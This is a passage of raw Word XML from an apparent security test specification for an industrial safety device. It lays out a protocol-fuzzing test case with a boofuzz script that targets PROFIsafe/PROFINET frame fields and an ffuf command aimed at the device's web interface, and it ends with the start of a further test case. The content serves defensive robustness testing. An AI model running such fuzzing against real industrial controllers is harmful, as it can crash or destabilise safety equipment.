          <w:p w14:paraId="144E3BB0" w14:textId="14E0139C" w:rsidR="00B73A1A" w:rsidRPr="00D45564" w:rsidRDefault="00D45564"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sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D45564">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC1002_flood.pcapng, per-step qualifier/DO/state log, PLC watch-table export, FS-LED video</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="227A9A3A" w14:textId="77777777" w:rsidR="006761B9" w:rsidRDefault="006761B9" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EF57985" w14:textId="77777777" w:rsidR="006761B9" w:rsidRDefault="006761B9" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F92092F" w14:textId="0617E0FF" w:rsidR="006761B9" w:rsidRDefault="00BA65DE" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006868A2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TC-RQ010-03 -  Protocol Fuzzing Robustness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDF294E" w14:textId="77777777" w:rsidR="00E60591" w:rsidRPr="006868A2" w:rsidRDefault="00E60591" w:rsidP="00E60591">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006868A2">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60591" w14:paraId="777668B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405E64" w14:textId="77777777" w:rsidR="00E60591" w:rsidRDefault="00E60591" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7371FFFC" w14:textId="77777777" w:rsidR="00E60591"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E60591" w14:paraId="200CAC6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9B6223" w14:textId="77777777" w:rsidR="00E60591" w:rsidRDefault="00E60591" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Test Case ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28109ABA" w14:textId="695BB360" w:rsidR="00E60591" w:rsidRPr="003F2591" w:rsidRDefault="007F065B"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F065B">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ010-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E60591" w:rsidRPr="00EE7A74" w14:paraId="3AC1AF4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13E0B23" w14:textId="77777777" w:rsidR="00E60591" w:rsidRDefault="00E60591" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="643E07E4" w14:textId="3B3A14C2" w:rsidR="00E60591" w:rsidRPr="003F2591" w:rsidRDefault="002F134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2F1344">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t>RQ-010 → CR 3.5 / CR 3.7 / CR 3.6 → Asset H, Asset A, Asset E</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E60591" w:rsidRPr="00D67CA6" w14:paraId="11EFD7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6E6E38" w14:textId="77777777" w:rsidR="00E60591" w:rsidRDefault="00E60591" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E8726FF" w14:textId="0EA53EDC" w:rsidR="00E60591" w:rsidRPr="003F2591" w:rsidRDefault="002F134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Tampering</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E60591" w14:paraId="7980C11F"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92B6C05" w14:textId="77777777" w:rsidR="00E60591" w:rsidRDefault="00E60591" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51DBD4D5" w14:textId="66B3ADF0" w:rsidR="00E60591" w:rsidRPr="003F2591" w:rsidRDefault="002F134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SVV-4 (Penetration Testing/Fuzzing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E60591" w:rsidRPr="00EE7A74" w14:paraId="67E0D38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B7DC8FB" w14:textId="77777777" w:rsidR="00E60591" w:rsidRDefault="00E60591" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="039435CE" w14:textId="55B59AE9" w:rsidR="00E60591" w:rsidRPr="003F2591" w:rsidRDefault="00A42E95" w:rsidP="00A42E95">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="2417"/>
              </w:tabs>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A42E95">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Determine whether malformed PROFINET/DCP, PROFIsafe, and HTTP/IoT-Core inputs are safely rejected (CR 3.5 input validation, CR 3.7 error </w:t>
            </w:r>
            <w:r w:rsidRPr="00A42E95">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>handling) or cause a crash/hang/undefined state</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="00A42E95">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> verifying the device "withstands" unexpected input without a hazardous condition.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E60591" w:rsidRPr="00EE7A74" w14:paraId="777CCCC5"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7201559" w14:textId="77777777" w:rsidR="00E60591" w:rsidRDefault="00E60591" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00BC9EB2" w14:textId="77777777" w:rsidR="00B86C18" w:rsidRDefault="00B86C18"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86C18">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Establish OPERATE. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0835BB0E" w14:textId="77777777" w:rsidR="00B86C18" w:rsidRDefault="00B86C18"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86C18">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Fuzz each interface: DCP (identify/set malformed), PROFIsafe frame fields (length/CRC/control byte), HTTP requests to IoT-Core. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64DFC45B" w14:textId="5F20CBC2" w:rsidR="00E60591" w:rsidRPr="003F2591" w:rsidRDefault="00B86C18"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86C18">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>3. Monitor for crash/hang/watchdog reset vs safe rejection/passivation. 4. Log every input that changes device state; root-cause each.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E60591" w:rsidRPr="00EE7A74" w14:paraId="764CAB4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C8891F" w14:textId="77777777" w:rsidR="00E60591" w:rsidRDefault="00E60591" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D411EEF" w14:textId="12C8EAE2" w:rsidR="00E60591" w:rsidRPr="003F2591" w:rsidRDefault="00F217A8" w:rsidP="00F217A8">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="2041"/>
              </w:tabs>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F217A8">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>PASS if all malformed inputs are safely rejected or resolve to passivation (Low/qualifier-bad), with no crash into an undefined/hazardous state. FAIL if any malformed input causes a hang, uncommanded output, or unrecoverable state (other than the defined safe state).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="76530DAA" w14:textId="77777777" w:rsidR="00E60591" w:rsidRPr="00AF57B2" w:rsidRDefault="00E60591" w:rsidP="00E60591">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B403B5A" w14:textId="77777777" w:rsidR="00E60591" w:rsidRDefault="00E60591" w:rsidP="00E60591">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E60591" w14:paraId="7EACCAD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31CAA2" w14:textId="77777777" w:rsidR="00E60591" w:rsidRDefault="00E60591" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="033761BA" w14:textId="77777777" w:rsidR="00E60591"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E60591" w14:paraId="7BDB862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EFD6F5" w14:textId="77777777" w:rsidR="00E60591" w:rsidRDefault="00E60591" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D164ED8" w14:textId="67E0C3CD" w:rsidR="00E60591" w:rsidRPr="003F2591" w:rsidRDefault="005179E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179E1">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ010-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E60591" w:rsidRPr="00EE7A74" w14:paraId="604674E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FB5EC78" w14:textId="77777777" w:rsidR="00E60591" w:rsidRDefault="00E60591" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="713D85E4" w14:textId="1DC0A979" w:rsidR="00E60591" w:rsidRPr="003F2591" w:rsidRDefault="00A15A7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15A7E">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pi eth0 (fuzzer) + mgmt path for HTTP; DUT 192.168.0.2; laptop mirror; PLC crash-monitor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E60591" w:rsidRPr="00EE7A74" w14:paraId="29BA247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9FFFCDE" w14:textId="77777777" w:rsidR="00E60591" w:rsidRDefault="00E60591" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C948B8B" w14:textId="5E172B3C" w:rsidR="00E60591" w:rsidRPr="003F2591" w:rsidRDefault="001B473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B4736">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>boofuzz (ifm CM-010) for PROFIsafe/DCP; boofuzz/ffuf for HTTP; Wireshark; PLC watchdog</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E60591" w:rsidRPr="00EE7A74" w14:paraId="7AF0565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516DD2C" w14:textId="77777777" w:rsidR="00E60591" w:rsidRDefault="00E60591" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A399213"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 TC-RQ010-03 boofuzz skeleton for PROFIsafe frame-field fuzzing (Layer 2)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DA5CB21"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from boofuzz import *</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C6E7DDE"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session = Session(target=Target(connection=RawL2SocketConnection("eth0")))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55DF6F0F"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s_initialize("psafe")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77B4823D"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s_bytes(b"\x88\x92", name="ethertype", fuzzable=False)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62F55EA9"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s_bytes(b"\x00"*4, name="pn_rt_hdr", fuzzable=True)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A3D6703"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s_bytes(b"\x00"*8, name="pd", fuzzable=True) # process data</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20A5D454"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s_byte(0x00, name="status", fuzzable=True) # PROFIsafe status/control</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14CF6645"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s_bytes(b"\x00"*4, name="crc", fuzzable=True) # 4-byte CRC</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7393310A"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session.connect(s_get("psafe"))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70CD53E0"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session.fuzz() # crashes logged at http://127.0.0.1:26000</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1017B356"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 HTTP/IoT-Core malformed-request fuzzing (management path)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="392FD44D" w14:textId="7847A090" w:rsidR="00E60591" w:rsidRPr="003F2591"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ffuf -u http://192.168.0.2/FUZZ -w big-wordlist.txt -mc all -o TC1003_http.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E60591" w:rsidRPr="00EE7A74" w14:paraId="5DF7A35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12DA65D" w14:textId="77777777" w:rsidR="00E60591" w:rsidRDefault="00E60591" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Expected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F543EBC" w14:textId="3D2AF29F" w:rsidR="00E60591" w:rsidRPr="003F2591" w:rsidRDefault="004C210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C2104">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Malformed inputs rejected or → passivation; no crash/hang/uncommanded output; PLC watchdog registers no unsafe transition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E60591" w:rsidRPr="00EE7A74" w14:paraId="2306D90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0430460" w14:textId="77777777" w:rsidR="00E60591" w:rsidRDefault="00E60591" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="260B8555" w14:textId="5C1F37AB" w:rsidR="00E60591" w:rsidRPr="003F2591" w:rsidRDefault="004C2104"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All inputs safetly handled/ Crash/hang found (ro</w:t>
            </w:r>
            <w:r w:rsidR="00296369">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ot-cause + FAIL)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E60591" w:rsidRPr="00EE7A74" w14:paraId="3561857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8C0F740" w14:textId="77777777" w:rsidR="00E60591" w:rsidRDefault="00E60591" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DDA28F0" w14:textId="057543AA" w:rsidR="00E60591" w:rsidRPr="003F2591" w:rsidRDefault="00064953"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064953">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>boofuzz session DB, TC1003_http.json, crash payloads + timestamps, mirror PCAP, PLC state log</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="35A6F228" w14:textId="69FB24EE" w:rsidR="006761B9" w:rsidRDefault="006761B9" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DD993B4" w14:textId="4C551F85" w:rsidR="00AE2023" w:rsidRDefault="00E33E4C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D73D4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ010-05 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00D73D4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Outcome-Verification Aggregation Harness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352701A1" w14:textId="77777777" w:rsidR="00AE2023" w:rsidRDefault="00AE2023" w:rsidP="00AE2023">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AE2023" w14:paraId="609A722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764545" w14:textId="77777777" w:rsidR="00AE2023" w:rsidRDefault="00AE2023" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="384C425B" w14:textId="77777777" w:rsidR="00AE2023"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AE2023" w14:paraId="5DDF815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1B0F60" w14:textId="77777777" w:rsidR="00AE2023" w:rsidRDefault="00AE2023" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Test Case ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4929A659" w14:textId="6008021E" w:rsidR="00AE2023" w:rsidRPr="003F2591" w:rsidRDefault="0068138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81388">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ010-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE2023" w:rsidRPr="001604A0" w14:paraId="5EE63AF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6270EA39" w14:textId="77777777" w:rsidR="00AE2023" w:rsidRDefault="00AE2023" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="20D678D5" w14:textId="551C52B3" w:rsidR="00AE2023" w:rsidRPr="003F2591" w:rsidRDefault="0072453B"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72453B">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t>RQ-010 (EHSR success criterion) → CR 3.6 → Asset A, Asset E</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE2023" w:rsidRPr="00EE7A74" w14:paraId="3B6DA10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715A1E" w14:textId="77777777" w:rsidR="00AE2023" w:rsidRDefault="00AE2023" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="349B0DCF" w14:textId="48FEF070" w:rsidR="00AE2023" w:rsidRPr="003F2591" w:rsidRDefault="00873FC0"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commentRangeStart w:id="15"/>
